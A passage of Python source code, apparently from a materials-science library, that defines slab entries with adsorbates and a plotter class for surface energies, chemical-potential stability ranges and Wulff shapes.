unit_a = self.get_unit_primitive_area
Nsurfs = self.Nsurfs_ads_in_slab
Nads = self.Nads_in_slab
return Nads / (unit_a * Nsurfs)
@property
def Nads_in_slab(self):
"""
Returns the TOTAL number of adsorbates in the slab on BOTH sides
"""
return sum(self.composition.as_dict()[a] for a in self.ads_entries_dict.keys())
@property
def Nsurfs_ads_in_slab(self):
"""
Returns the TOTAL number of adsorbed surfaces in the slab
"""
struct = self.structure
weights = [s.species.weight for s in struct]
center_of_mass = np.average(struct.frac_coords, weights=weights, axis=0)
Nsurfs = 0
# Are there adsorbates on top surface?
if any(
site.species_string in self.ads_entries_dict.keys()
for site in struct
if site.frac_coords[2] > center_of_mass[2]
):
Nsurfs += 1
# Are there adsorbates on bottom surface?
if any(
site.species_string in self.ads_entries_dict.keys()
for site in struct
if site.frac_coords[2] < center_of_mass[2]
):
Nsurfs += 1
return Nsurfs
@classmethod
def from_dict(cls, d):
"""
Returns a SlabEntry by reading in an dictionary
"""
structure = SlabEntry.from_dict(d["structure"])
energy = SlabEntry.from_dict(d["energy"])
miller_index = d["miller_index"]
label = d["label"]
adsorbates = d["adsorbates"]
clean_entry = d["clean_entry"]
return SlabEntry(
structure,
energy,
miller_index,
label=label,
adsorbates=adsorbates,
clean_entry=clean_entry,
)
@property
def surface_area(self):
"""
Calculates the surface area of the slab
"""
m = self.structure.lattice.matrix
return np.linalg.norm(np.cross(m[0], m[1]))
@property
def cleaned_up_slab(self):
"""
Returns a slab with the adsorbates removed
"""
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.structure.copy()
cleaned.remove_species(ads_strs)
return cleaned
@property
def create_slab_label(self):
"""
Returns a label (str) for this particular slab based
on composition, coverage and Miller index.
"""
if "label" in self.data.keys():
return self.data["label"]
label = str(self.miller_index)
ads_strs = list(self.ads_entries_dict.keys())
cleaned = self.cleaned_up_slab
label += f" {cleaned.composition.reduced_composition}"
if self.adsorbates:
for ads in ads_strs:
label += f"+{ads}"
label += f", {self.get_monolayer:.3f} ML"
return label
@staticmethod
def from_computed_structure_entry(entry, miller_index, label=None, adsorbates=None, clean_entry=None, **kwargs):
"""
Returns SlabEntry from a ComputedStructureEntry
"""
return SlabEntry(
entry.structure,
entry.energy,
miller_index,
label=label,
adsorbates=adsorbates,
clean_entry=clean_entry,
**kwargs,
)
class SurfaceEnergyPlotter:
"""
A class used for generating plots to analyze the thermodynamics of surfaces
of a material. Produces stability maps of different slab configurations,
phases diagrams of two parameters to determine stability of configurations
(future release), and Wulff shapes.
.. attribute:: all_slab_entries
Either a list of SlabEntry objects (note for a list, the SlabEntry must
have the adsorbates and clean_entry parameter pulgged in) or a Nested
dictionary containing a list of entries for slab calculations as
items and the corresponding Miller index of the slab as the key.
To account for adsorption, each value is a sub-dictionary with the
entry of a clean slab calculation as the sub-key and a list of
entries for adsorption calculations as the sub-value. The sub-value
can contain different adsorption configurations such as a different
site or a different coverage, however, ordinarily only the most stable
configuration for a particular coverage will be considered as the
function of the adsorbed surface energy has an intercept dependent on
the adsorption energy (ie an adsorption site with a higher adsorption
energy will always provide a higher surface energy than a site with a
lower adsorption energy). An example parameter is provided:
{(h1,k1,l1): {clean_entry1: [ads_entry1, ads_entry2, ...],
clean_entry2: [...], ...}, (h2,k2,l2): {...}}
where clean_entry1 can be a pristine surface and clean_entry2 can be a
reconstructed surface while ads_entry1 can be adsorption at site 1 with
a 2x2 coverage while ads_entry2 can have a 3x3 coverage. If adsorption
entries are present (i.e. if all_slab_entries[(h,k,l)][clean_entry1]), we
consider adsorption in all plots and analysis for this particular facet.
..attribute:: color_dict
Dictionary of colors (r,g,b,a) when plotting surface energy stability. The
keys are individual surface entries where clean surfaces have a solid
color while the corresponding adsorbed surface will be transparent.
.. attribute:: ucell_entry
ComputedStructureEntry of the bulk reference for this particular material.
.. attribute:: ref_entries
List of ComputedStructureEntries to be used for calculating chemical potential.
.. attribute:: color_dict
Randomly generated dictionary of colors associated with each facet.
"""
def __init__(self, all_slab_entries, ucell_entry, ref_entries=None):
"""
Object for plotting surface energy in different ways for clean and
adsorbed surfaces.
Args:
all_slab_entries (dict or list): Dictionary or list containing
all entries for slab calculations. See attributes.
ucell_entry (ComputedStructureEntry): ComputedStructureEntry
of the bulk reference for this particular material.
ref_entries ([ComputedStructureEntries]): A list of entries for
each type of element to be used as a reservoir for
nonstoichiometric systems. The length of this list MUST be
n-1 where n is the number of different elements in the bulk
entry. The bulk energy term in the grand surface potential can
be defined by a summation of the chemical potentials for each
element in the system. As the bulk energy is already provided,
one can solve for one of the chemical potentials as a function
of the other chemical potetinals and bulk energy. i.e. there
are n-1 variables (chempots). e.g. if your ucell_entry is for
LiFePO4 than your ref_entries should have an entry for Li, Fe,
and P if you want to use the chempot of O as the variable.
"""
self.ucell_entry = ucell_entry
self.ref_entries = ref_entries
self.all_slab_entries = (
all_slab_entries if type(all_slab_entries).__name__ == "dict" else entry_dict_from_list(all_slab_entries)
)
self.color_dict = self.color_palette_dict()
se_dict, as_coeffs_dict = {}, {}
for hkl in self.all_slab_entries.keys():
for clean in self.all_slab_entries[hkl].keys():
se = clean.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[clean] = se
as_coeffs_dict[clean] = {1: se}
else:
se_dict[clean] = se
as_coeffs_dict[clean] = se.as_coefficients_dict()
for dope in self.all_slab_entries[hkl][clean]:
se = dope.surface_energy(self.ucell_entry, ref_entries=self.ref_entries)
if type(se).__name__ == "float":
se_dict[dope] = se
as_coeffs_dict[dope] = {1: se}
else:
se_dict[dope] = se
as_coeffs_dict[dope] = se.as_coefficients_dict()
self.surfe_dict = se_dict
self.as_coeffs_dict = as_coeffs_dict
list_of_chempots = []
for k, v in self.as_coeffs_dict.items():
if type(v).__name__ == "float":
continue
for du in v.keys():
if du not in list_of_chempots:
list_of_chempots.append(du)
self.list_of_chempots = list_of_chempots
def get_stable_entry_at_u(
self,
miller_index,
delu_dict=None,
delu_default=0,
no_doped=False,
no_clean=False,
):
"""
Returns the entry corresponding to the most stable slab for a particular
facet at a specific chempot. We assume that surface energy is constant
so all free variables must be set with delu_dict, otherwise they are
assumed to be equal to delu_default.
Args:
miller_index ((h,k,l)): The facet to find the most stable slab in
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
SlabEntry, surface_energy (float)
"""
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
def get_coeffs(e):
coeffs = []
for du in all_delu_dict.keys():
if type(self.as_coeffs_dict[e]).__name__ == "float":
coeffs.append(self.as_coeffs_dict[e])
elif du in self.as_coeffs_dict[e].keys():
coeffs.append(self.as_coeffs_dict[e][du])
else:
coeffs.append(0)
return np.array(coeffs)
all_entries, all_coeffs = [], []
for entry in self.all_slab_entries[miller_index].keys():
if not no_clean:
all_entries.append(entry)
all_coeffs.append(get_coeffs(entry))
if not no_doped:
for ads_entry in self.all_slab_entries[miller_index][entry]:
all_entries.append(ads_entry)
all_coeffs.append(get_coeffs(ads_entry))
du_vals = np.array(list(all_delu_dict.values()))
all_gamma = list(np.dot(all_coeffs, du_vals.T))
return all_entries[all_gamma.index(min(all_gamma))], float(min(all_gamma))
def wulff_from_chempot(
self,
delu_dict=None,
delu_default=0,
symprec=1e-5,
no_clean=False,
no_doped=False,
):
"""
Method to get the Wulff shape at a specific chemical potential.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
symprec (float): See WulffShape.
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
Returns:
(WulffShape): The WulffShape at u_ref and u_ads.
"""
latt = SpacegroupAnalyzer(self.ucell_entry.structure).get_conventional_standard_structure().lattice
miller_list = self.all_slab_entries.keys()
e_surf_list = []
for hkl in miller_list:
# For all configurations, calculate surface energy as a
# function of u. Use the lowest surface energy (corresponds
# to the most stable slab termination at that particular u)
gamma = self.get_stable_entry_at_u(
hkl,
delu_dict=delu_dict,
delu_default=delu_default,
no_clean=no_clean,
no_doped=no_doped,
)[1]
e_surf_list.append(gamma)
return WulffShape(latt, miller_list, e_surf_list, symprec=symprec)
def area_frac_vs_chempot_plot(
self,
ref_delu,
chempot_range,
delu_dict=None,
delu_default=0,
increments=10,
no_clean=False,
no_doped=False,
):
"""
1D plot. Plots the change in the area contribution
of each facet as a function of chemical potential.
Args:
ref_delu (sympy Symbol): The free variable chempot with the format:
Symbol("delu_el") where el is the name of the element.
chempot_range (list): Min/max range of chemical potential to plot along
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
increments (int): Number of data points between min/max or point
of intersection. Defaults to 10 points.
Returns:
(Pylab): Plot of area frac on the Wulff shape
for each facet vs chemical potential.
"""
delu_dict = delu_dict if delu_dict else {}
chempot_range = sorted(chempot_range)
all_chempots = np.linspace(min(chempot_range), max(chempot_range), increments)
# initialize a dictionary of lists of fractional areas for each hkl
hkl_area_dict = {}
for hkl in self.all_slab_entries.keys():
hkl_area_dict[hkl] = []
# Get plot points for each Miller index
for u in all_chempots:
delu_dict[ref_delu] = u
wulffshape = self.wulff_from_chempot(
delu_dict=delu_dict,
no_clean=no_clean,
no_doped=no_doped,
delu_default=delu_default,
)
for hkl in wulffshape.area_fraction_dict.keys():
hkl_area_dict[hkl].append(wulffshape.area_fraction_dict[hkl])
# Plot the area fraction vs chemical potential for each facet
plt = pretty_plot(width=8, height=7)
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
clean_entry = list(self.all_slab_entries[hkl].keys())[0]
# Ignore any facets that never show up on the
# Wulff shape regardless of chemical potential
if all(a == 0 for a in hkl_area_dict[hkl]):
continue
plt.plot(
all_chempots,
hkl_area_dict[hkl],
"--",
color=self.color_dict[clean_entry],
label=str(hkl),
)
# Make the figure look nice
plt.ylabel(r"Fractional area $A^{Wulff}_{hkl}/A^{Wulff}$")
self.chempot_plot_addons(
plt,
chempot_range,
str(ref_delu).split("_")[1],
axes,
rect=[-0.0, 0, 0.95, 1],
pad=5,
ylim=[0, 1],
)
return plt
def get_surface_equilibrium(self, slab_entries, delu_dict=None):
"""
Takes in a list of SlabEntries and calculates the chemical potentials
at which all slabs in the list coexists simultaneously. Useful for
building surface phase diagrams. Note that to solve for x equations
(x slab_entries), there must be x free variables (chemical potentials).
Adjust delu_dict as need be to get the correct number of free variables.
Args:
slab_entries (array): The coefficients of the first equation
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
Returns:
(array): Array containing a solution to x equations with x
variables (x-1 chemical potential and 1 surface energy)
"""
# Generate all possible coefficients
all_parameters = []
all_eqns = []
for slab_entry in slab_entries:
se = self.surfe_dict[slab_entry]
# remove the free chempots we wish to keep constant and
# set the equation to 0 (subtract gamma from both sides)
if type(se).__name__ == "float":
all_eqns.append(se - Symbol("gamma"))
else:
se = sub_chempots(se, delu_dict) if delu_dict else se
all_eqns.append(se - Symbol("gamma"))
all_parameters.extend([p for p in list(se.free_symbols) if p not in all_parameters])
all_parameters.append(Symbol("gamma"))
# Now solve the system of linear eqns to find the chempot
# where the slabs are at equilibrium with each other
soln = linsolve(all_eqns, all_parameters)
if not soln:
warnings.warn("No solution")
return soln
return {p: list(soln)[0][i] for i, p in enumerate(all_parameters)}
def stable_u_range_dict(
self,
chempot_range,
ref_delu,
no_doped=True,
no_clean=False,
delu_dict={},
miller_index=(),
dmu_at_0=False,
return_se_dict=False,
):
"""
Creates a dictionary where each entry is a key pointing to a
chemical potential range where the surface of that entry is stable.
Does so by enumerating through all possible solutions (intersect)
for surface energies of a specific facet.
Args:
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
no_doped (bool): Consider stability of clean slabs only.
no_clean (bool): Consider stability of doped slabs only.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
dmu_at_0 (bool): If True, if the surface energies corresponding to
the chemical potential range is between a negative and positive
value, the value is a list of three chemical potentials with the
one in the center corresponding a surface energy of 0. Uselful
in identifying unphysical ranges of surface energies and their
chemical potential range.
return_se_dict (bool): Whether or not to return the corresponding
dictionary of surface energies
"""
chempot_range = sorted(chempot_range)
stable_urange_dict, se_dict = {}, {}
# Get all entries for a specific facet
for hkl in self.all_slab_entries.keys():
entries_in_hkl = []
# Skip this facet if this is not the facet we want
if miller_index and hkl != tuple(miller_index):
continue
if not no_clean:
entries_in_hkl.extend(self.all_slab_entries[hkl])
if not no_doped:
for entry in self.all_slab_entries[hkl]:
entries_in_hkl.extend(self.all_slab_entries[hkl][entry])
for entry in entries_in_hkl:
stable_urange_dict[entry] = []
se_dict[entry] = []
# if there is only one entry for this facet, then just give it the
# default urange, you can't make combinations with just 1 item
if len(entries_in_hkl) == 1:
stable_urange_dict[entries_in_hkl[0]] = chempot_range
u1, u2 = delu_dict.copy(), delu_dict.copy()
u1[ref_delu], u2[ref_delu] = chempot_range[0], chempot_range[1]
se = self.as_coeffs_dict[entries_in_hkl[0]]
se_dict[entries_in_hkl[0]] = [
sub_chempots(se, u1),
sub_chempots(se, u2),
]
continue
for pair in itertools.combinations(entries_in_hkl, 2):
# I'm assuming ref_delu was not set in delu_dict,
# so the solution should be for ref_delu
solution = self.get_surface_equilibrium(pair, delu_dict=delu_dict)
# Check if this solution is stable
if not solution:
continue
new_delu_dict = delu_dict.copy()
new_delu_dict[ref_delu] = solution[ref_delu]
stable_entry, gamma = self.get_stable_entry_at_u(
hkl, new_delu_dict, no_doped=no_doped, no_clean=no_clean
)
if stable_entry not in pair:
continue
# Now check if the solution is within the chempot range
if not chempot_range[0] <= solution[ref_delu] <= chempot_range[1]:
continue
for entry in pair:
stable_urange_dict[entry].append(solution[ref_delu])
se_dict[entry].append(gamma)
# Now check if all entries have 2 chempot values. If only
# one, we need to set the other value as either the upper
# limit or lower limit of the user provided chempot_range
new_delu_dict = delu_dict.copy()
for u in chempot_range:
new_delu_dict[ref_delu] = u
entry, gamma = self.get_stable_entry_at_u(
hkl, delu_dict=new_delu_dict, no_doped=no_doped, no_clean=no_clean
)
stable_urange_dict[entry].append(u)
se_dict[entry].append(gamma)
if dmu_at_0:
for entry, v in se_dict.items():
# if se are of opposite sign, determine chempot when se=0.
# Useful for finding a chempot range where se is unphysical
if not stable_urange_dict[entry]:
continue
if v[0] * v[1] < 0:
# solve for gamma=0
se = self.as_coeffs_dict[entry]
v.append(0)
stable_urange_dict[entry].append(solve(sub_chempots(se, delu_dict), ref_delu)[0])
# sort the chempot ranges for each facet
for entry, v in stable_urange_dict.items():
se_dict[entry] = [se for i, se in sorted(zip(v, se_dict[entry]))]
stable_urange_dict[entry] = sorted(v)
if return_se_dict:
return stable_urange_dict, se_dict
return stable_urange_dict
def color_palette_dict(self, alpha=0.35):
"""
Helper function to assign each facet a unique color using a dictionary.
Args:
alpha (float): Degree of transparency
return (dict): Dictionary of colors (r,g,b,a) when plotting surface
energy stability. The keys are individual surface entries where
clean surfaces have a solid color while the corresponding adsorbed
surface will be transparent.
"""
color_dict = {}
for hkl in self.all_slab_entries.keys():
rgb_indices = [0, 1, 2]
color = [0, 0, 0, 1]
random.shuffle(rgb_indices)
for i, ind in enumerate(rgb_indices):
if i == 2:
break
color[ind] = np.random.uniform(0, 1)
# Get the clean (solid) colors first
clean_list = np.linspace(0, 1, len(self.all_slab_entries[hkl]))
for i, clean in enumerate(self.all_slab_entries[hkl].keys()):
c = copy.copy(color)
c[rgb_indices[2]] = clean_list[i]
color_dict[clean] = c
# Now get the adsorbed (transparent) colors
for ads_entry in self.all_slab_entries[hkl][clean]:
c_ads = copy.copy(c)
c_ads[3] = alpha
color_dict[ads_entry] = c_ads
return color_dict
def chempot_vs_gamma_plot_one(
self,
plt,
entry,
ref_delu,
chempot_range,
delu_dict={},
delu_default=0,
label="",
JPERM2=False,
):
"""
Helper function to help plot the surface energy of a
single SlabEntry as a function of chemical potential.
Args:
plt (Plot): A plot.
entry (SlabEntry): Entry of the slab whose surface energy we want
to plot
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
label (str): Label of the slab for the legend.
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of surface energy vs chemical potential for one entry.
"""
chempot_range = sorted(chempot_range)
# use dashed lines for slabs that are not stoichiometric
# wrt bulk. Label with formula if nonstoichiometric
ucell_comp = self.ucell_entry.composition.reduced_composition
if entry.adsorbates:
s = entry.cleaned_up_slab
clean_comp = s.composition.reduced_composition
else:
clean_comp = entry.composition.reduced_composition
mark = "--" if ucell_comp != clean_comp else "-"
delu_dict = self.set_all_variables(delu_dict, delu_default)
delu_dict[ref_delu] = chempot_range[0]
gamma_min = self.as_coeffs_dict[entry]
gamma_min = gamma_min if type(gamma_min).__name__ == "float" else sub_chempots(gamma_min, delu_dict)
delu_dict[ref_delu] = chempot_range[1]
gamma_max = self.as_coeffs_dict[entry]
gamma_max = gamma_max if type(gamma_max).__name__ == "float" else sub_chempots(gamma_max, delu_dict)
gamma_range = [gamma_min, gamma_max]
se_range = np.array(gamma_range) * EV_PER_ANG2_TO_JOULES_PER_M2 if JPERM2 else gamma_range
mark = entry.mark if entry.mark else mark
c = entry.color if entry.color else self.color_dict[entry]
plt.plot(chempot_range, se_range, mark, color=c, label=label)
return plt
def chempot_vs_gamma(
self,
ref_delu,
chempot_range,
miller_index=(),
delu_dict={},
delu_default=0,
JPERM2=False,
show_unstable=False,
ylim=[],
plt=None,
no_clean=False,
no_doped=False,
use_entry_labels=False,
no_label=False,
):
"""
Plots the surface energy as a function of chemical potential.
Each facet will be associated with its own distinct colors.
Dashed lines will represent stoichiometries different from that
of the mpid's compound. Transparent lines indicates adsorption.
Args:
ref_delu (sympy Symbol): The range stability of each slab is based
on the chempot range of this chempot. Should be a sympy Symbol
object of the format: Symbol("delu_el") where el is the name of
the element
chempot_range ([max_chempot, min_chempot]): Range to consider the
stability of the slabs.
miller_index (list): Miller index for a specific facet to get a
dictionary for.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
show_unstable (bool): Whether or not to show parts of the surface
energy plot outside the region of stability.
ylim ([ymax, ymin]): Range of y axis
no_doped (bool): Whether to plot for the clean slabs only.
no_clean (bool): Whether to plot for the doped slabs only.
use_entry_labels (bool): If True, will label each slab configuration
according to their given label in the SlabEntry object.
no_label (bool): Option to turn off labels.
Returns:
(Plot): Plot of surface energy vs chempot for all entries.
"""
chempot_range = sorted(chempot_range)
plt = pretty_plot(width=8, height=7) if not plt else plt
axes = plt.gca()
for hkl in self.all_slab_entries.keys():
if miller_index and hkl != tuple(miller_index):
continue
# Get the chempot range of each surface if we only
# want to show the region where each slab is stable
if not show_unstable:
stable_u_range_dict = self.stable_u_range_dict(
chempot_range,
ref_delu,
no_doped=no_doped,
delu_dict=delu_dict,
miller_index=hkl,
)
already_labelled = []
label = ""
for clean_entry in self.all_slab_entries[hkl]:
urange = stable_u_range_dict[clean_entry] if not show_unstable else chempot_range
# Don't plot if the slab is unstable, plot if it is.
if urange != []:
label = clean_entry.label
if label in already_labelled:
label = None
else:
already_labelled.append(label)
if not no_clean:
if use_entry_labels:
label = clean_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(
plt,
clean_entry,
ref_delu,
urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2,
)
if not no_doped:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
# Plot the adsorbed slabs
# Generate a label for the type of slab
urange = stable_u_range_dict[ads_entry] if not show_unstable else chempot_range
if urange != []:
if use_entry_labels:
label = ads_entry.label
if no_label:
label = ""
plt = self.chempot_vs_gamma_plot_one(
plt,
ads_entry,
ref_delu,
urange,
delu_dict=delu_dict,
delu_default=delu_default,
label=label,
JPERM2=JPERM2,
)
# Make the figure look nice
plt.ylabel(r"Surface energy (J/$m^{2}$)") if JPERM2 else plt.ylabel(r"Surface energy (eV/$\AA^{2}$)")
plt = self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split("_")[1], axes, ylim=ylim)
return plt
def monolayer_vs_BE(self, plot_eads=False):
"""
Plots the binding energy energy as a function of monolayers (ML), i.e.
the fractional area adsorbate density for all facets. For each
facet at a specific monlayer, only plot the lowest binding energy.
Args:
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
Returns:
(Plot): Plot of binding energy vs monolayer for all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
ml_be_dict = {}
for clean_entry in self.all_slab_entries[hkl].keys():
if self.all_slab_entries[hkl][clean_entry]:
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
if ads_entry.get_monolayer not in ml_be_dict.keys():
ml_be_dict[ads_entry.get_monolayer] = 1000
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
if be < ml_be_dict[ads_entry.get_monolayer]:
ml_be_dict[ads_entry.get_monolayer] = be
# sort the binding energies and monolayers
# in order to properly draw a line plot
vals = sorted(ml_be_dict.items())
monolayers, BEs = zip(*vals)
plt.plot(monolayers, BEs, "-o", c=self.color_dict[clean_entry], label=hkl)
adsorbates = tuple(ads_entry.ads_entries_dict.keys())
plt.xlabel(" %s" * len(adsorbates) % adsorbates + " Coverage (ML)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads else plt.ylabel("Binding Energy (eV)")
plt.legend()
plt.tight_layout()
return plt
@staticmethod
def chempot_plot_addons(plt, xrange, ref_el, axes, pad=2.4, rect=[-0.047, 0, 0.84, 1], ylim=[]):
"""
Helper function to a chempot plot look nicer.
Args:
plt (Plot) Plot to add things to.
xrange (list): xlim parameter
ref_el (str): Element of the referenced chempot.
axes(axes) Axes object from matplotlib
pad (float) For tight layout
rect (list): For tight layout
ylim (ylim parameter):
return (Plot): Modified plot with addons.
return (Plot): Modified plot with addons.
"""
# Make the figure look nice
plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.0)
axes.set_xlabel(rf"Chemical potential $\Delta\mu_{{{ref_el}}}$ (eV)")
ylim = ylim if ylim else axes.get_ylim()
plt.xticks(rotation=60)
plt.ylim(ylim)
xlim = axes.get_xlim()
plt.xlim(xlim)
plt.tight_layout(pad=pad, rect=rect)
plt.plot([xrange[0], xrange[0]], ylim, "--k")
plt.plot([xrange[1], xrange[1]], ylim, "--k")
xy = [np.mean([xrange[1]]), np.mean(ylim)]
plt.annotate(f"{ref_el}-rich", xy=xy, xytext=xy, rotation=90, fontsize=17)
xy = [np.mean([xlim[0]]), np.mean(ylim)]
plt.annotate(f"{ref_el}-poor", xy=xy, xytext=xy, rotation=90, fontsize=17)
return plt
def BE_vs_clean_SE(
self,
delu_dict,
delu_default=0,
plot_eads=False,
annotate_monolayer=True,
JPERM2=False,
):
"""
For each facet, plot the clean surface energy against the most
stable binding energy.
Args:
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
delu_default (float): Default value for all unset chemical potentials
plot_eads (bool): Option to plot the adsorption energy (binding
energy multiplied by number of adsorbates) instead.
annotate_monolayer (bool): Whether or not to label each data point
with its monolayer (adsorbate density per unit primiitve area)
JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or
eV/A^2 (False)
Returns:
(Plot): Plot of clean surface energy vs binding energy for
all facets.
"""
plt = pretty_plot(width=8, height=7)
for hkl in self.all_slab_entries.keys():
for clean_entry in self.all_slab_entries[hkl].keys():
all_delu_dict = self.set_all_variables(delu_dict, delu_default)
if self.all_slab_entries[hkl][clean_entry]:
clean_se = self.as_coeffs_dict[clean_entry]
se = sub_chempots(clean_se, all_delu_dict)
for ads_entry in self.all_slab_entries[hkl][clean_entry]:
ml = ads_entry.get_monolayer
be = ads_entry.gibbs_binding_energy(eads=plot_eads)
# Now plot the surface energy vs binding energy
plt.scatter(se, be)
if annotate_monolayer:
plt.annotate(f"{ml:.2f}", xy=[se, be], xytext=[se, be])
plt.xlabel(r"Surface energy ($J/m^2$)") if JPERM2 else plt.xlabel(r"Surface energy ($eV/\AA^2$)")
plt.ylabel("Adsorption Energy (eV)") if plot_eads else plt.ylabel("Binding Energy (eV)")
plt.tight_layout()
plt.xticks(rotation=60)
return plt
def surface_chempot_range_map(
self,
elements,
miller_index,
ranges,
incr=50,
no_doped=False,
no_clean=False,
delu_dict=None,
plt=None,
annotate=True,
show_unphyiscal_only=False,
fontsize=10,
):
"""
Adapted from the get_chempot_range_map() method in the PhaseDiagram
class. Plot the chemical potential range map based on surface
energy stability. Currently works only for 2-component PDs. At
the moment uses a brute force method by enumerating through the
range of the first element chempot with a specified increment
and determines the chempot rangeo fht e second element for each
SlabEntry. Future implementation will determine the chempot range
map first by solving systems of equations up to 3 instead of 2.
Args:
elements (list): Sequence of elements to be considered as independent
variables. E.g., if you want to show the stability ranges of
all Li-Co-O phases wrt to duLi and duO, you will supply
[Element("Li"), Element("O")]
miller_index ([h, k, l]): Miller index of the surface we are interested in
ranges ([[range1], [range2]]): List of chempot ranges (max and min values)
for the first and second element.
incr (int): Number of points to sample along the range of the first chempot
no_doped (bool): Whether or not to include doped systems.
no_clean (bool): Whether or not to include clean systems.
delu_dict (Dict): Dictionary of the chemical potentials to be set as
constant. Note the key should be a sympy Symbol object of the
format: Symbol("delu_el") where el is the name of the element.
annotate (bool): Whether to annotate each "phase" with the label of
the entry. If no label, uses the reduced formula
show_unphyiscal_only (bool): Whether to only show the shaded region where
surface energy is negative. Useful for drawing other chempot range maps.
"""
# Set up
delu_dict = delu_dict if delu_dict else {}
plt = pretty_plot(12, 8) if not plt else plt
el1, el2 = str(elements[0]), str(elements[1])
delu1 = Symbol(f"delu_{str(elements[0])}")
delu2 = Symbol(f"delu_{str(elements[1])}")
range1 = ranges[0]
range2 = ranges[1]
# Find a range map for each entry (surface). This part is very slow, will
# need to implement a more sophisticated method of getting the range map
vertices_dict = {}
for dmu1 in np.linspace(range1[0], range1[1], incr):
# Get chemical potential range of dmu2 for each increment of dmu1
new_delu_dict = delu_dict.copy()
new_delu_dict[delu1] = dmu1
range_dict, se_dict = self.stable_u_range_dict(
range2,
delu2,
dmu_at_0=True,
miller_index=miller_index,
no_doped=no_doped,
no_clean=no_clean,
delu_dict=new_delu_dict,
return_se_dict=True,
)
# Save the chempot range for dmu1 and dmu2
for entry, v in range_dict.items():
if not v:
continue
if entry not in vertices_dict.keys():
vertices_dict[entry] = []
selist = se_dict[entry]
vertices_dict[entry].append({delu1: dmu1, delu2: [v, selist]})
# Plot the edges of the phases
for entry, v in vertices_dict.items():
xvals, yvals = [], []
# Plot each edge of a phase within the borders
for ii, pt1 in enumerate(v):
# Determine if the surface energy at this lower range
# of dmu2 is negative. If so, shade this region.
if len(pt1[delu2][1]) == 3:
if pt1[delu2][1][0] < 0:
neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]
else:
neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]
# Shade the threshold and region at which se<=0
plt.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, "k--")
elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0:
# Any chempot at at this point will result
# in se<0, shade the entire y range
if not show_unphyiscal_only:
plt.plot([pt1[delu1], pt1[delu1]], range2, "k--")
if ii == len(v) - 1:
break
pt2 = v[ii + 1]
if not show_unphyiscal_only:
plt.plot(
[pt1[delu1], pt2[delu1]],
[pt1[delu2][0][0], pt2[delu2][0][0]],
"k",
)
# Need these values to get a good position for labelling phases
xvals.extend([pt1[delu1], pt2[delu1]])
yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])
# Plot the edge along the max x value
pt = v[-1]
delu1, delu2 = pt.keys()
xvals.extend([pt[delu1], pt[delu1]])
yvals.extend(pt[delu2][0])
if not show_unphyiscal_only:
plt.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], "k")
if annotate:
# Label the phases
x = np.mean([max(xvals), min(xvals)])
y = np.mean([max(yvals), min(yvals)])
label = entry.label if entry.label else entry.composition.reduced_formula
plt.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)
# Label plot
plt.xlim(range1)
plt.ylim(range2)
plt.xlabel(rf"$\Delta\mu_{{{el1}}} (eV)$", fontsize=25)
plt.ylabel(rf"$\Delta\mu_{{{el2}}} (eV)$", fontsize=25)
plt.xticks(rotation=60)
return plt
def set_all_variables(self, delu_dict, delu_default):
"""
Sets all chemical potential values and returns a dictionary where
